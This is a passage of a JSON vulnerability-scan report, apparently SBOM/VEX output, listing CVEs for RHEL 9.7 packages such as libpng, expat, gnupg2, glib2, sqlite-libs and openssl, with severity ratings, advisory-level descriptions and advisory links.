          "url": "https://ubuntu.com/security/notices/USN-7924-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64506"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/11/22/1"
        }
      ],
      "published": "2025-11-25T00:15:47+00:00",
      "updated": "2025-11-26T18:34:38+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-12.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-66382",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-66382"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/12/02/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-66382"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/1076"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66382"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-66382"
        }
      ],
      "published": "2025-11-28T07:15:57+00:00",
      "updated": "2026-05-12T13:17:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.5.0-5.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-68972",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        347
      ],
      "description": "In GnuPG through 2.4.8, if a signed message has \\f at the end of a plaintext line, an adversary can construct a modified message that places additional text after the signed material, such that signature verification of the modified message succeeds (although an \"invalid armor\" message is printed during verification). This is related to use of \\f as a marker to denote truncation of a long plaintext line.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-68972"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-68972"
        },
        {
          "url": "https://gpg.fail/formfeed"
        },
        {
          "url": "https://media.ccc.de/v/39c3-to-sign-or-not-to-sign-practical-vulnerabilities-i"
        },
        {
          "url": "https://news.ycombinator.com/item?id=46404339"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-68972"
        }
      ],
      "published": "2025-12-27T23:15:40+00:00",
      "updated": "2026-01-09T20:08:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-7039",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A flaw was found in glib. An integer overflow during temporary file creation leads to an out-of-bounds memory access, allowing an attacker to potentially perform path traversal or access private temporary file content by creating symbolic links. This vulnerability allows a local attacker to manipulate file paths and access unauthorized data. The core issue stems from insufficient validation of file path lengths during temporary file operations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-7039"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-7039"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392423"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3716"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7039"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-7039"
        }
      ],
      "published": "2025-09-03T02:15:38+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.68.4-18.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-70873",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        244
      ],
      "description": "An information disclosure issue in the zipfileInflate function in the zipfile extension in SQLite v3.51.1 and earlier allows attackers to obtain heap memory contents by supplying a crafted ZIP file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-70873"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-70873"
        },
        {
          "url": "https://gist.github.com/cnwangjihe/f496393f30f5ecec5b18c8f5ab072054"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70873"
        },
        {
          "url": "https://sqlite.org/forum/forumpost/761eac3c82"
        },
        {
          "url": "https://sqlite.org/src/info/3d459f1fb1bd1b5e"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-70873"
        }
      ],
      "published": "2026-03-12T19:16:15+00:00",
      "updated": "2026-04-16T21:15:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.34.1-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-9232",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Issue summary: An application using the OpenSSL HTTP client API functions may\ntrigger an out-of-bounds read if the 'no_proxy' environment variable is set and\nthe host portion of the authority component of the HTTP URL is an IPv6 address.\n\nImpact summary: An out-of-bounds read can trigger a crash which leads to\nDenial of Service for an application.\n\nThe OpenSSL HTTP client API functions can be used directly by applications\nbut they are also used by the OCSP client functions and CMP (Certificate\nManagement Protocol) client implementation in OpenSSL. However the URLs used\nby these implementations are unlikely to be controlled by an attacker.\n\nIn this vulnerable code the out of bounds read can only trigger a crash.\nFurthermore the vulnerability requires an attacker-controlled URL to be\npassed from an application to the OpenSSL function and the user has to have\na 'no_proxy' environment variable set. For the aforementioned reasons the\nissue was assessed as Low severity.\n\nThe vulnerable code was introduced in the following patch releases:\n3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.\n\nThe FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this\nissue, as the HTTP client implementation is outside the OpenSSL FIPS module\nboundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-9232"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/09/30/5"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-9232"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-089022.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-76r2-c3cg-f5r9"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2b4ec20e47959170422922eaff25346d362dcb35"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/654dc11d23468a74fc8ea4672b702dd3feb7be4b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7cf21a30513c9e43c4bc3836c237cf086e194af3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/89e790ac431125a4849992858490bed6b225eadf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/bbf38c034cdabd0a13330abcc4855c866f53d2e0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9232"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20250930.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7786-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
        }
      ],
      "published": "2025-09-30T14:15:41+00:00",
      "updated": "2026-05-12T13:17:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
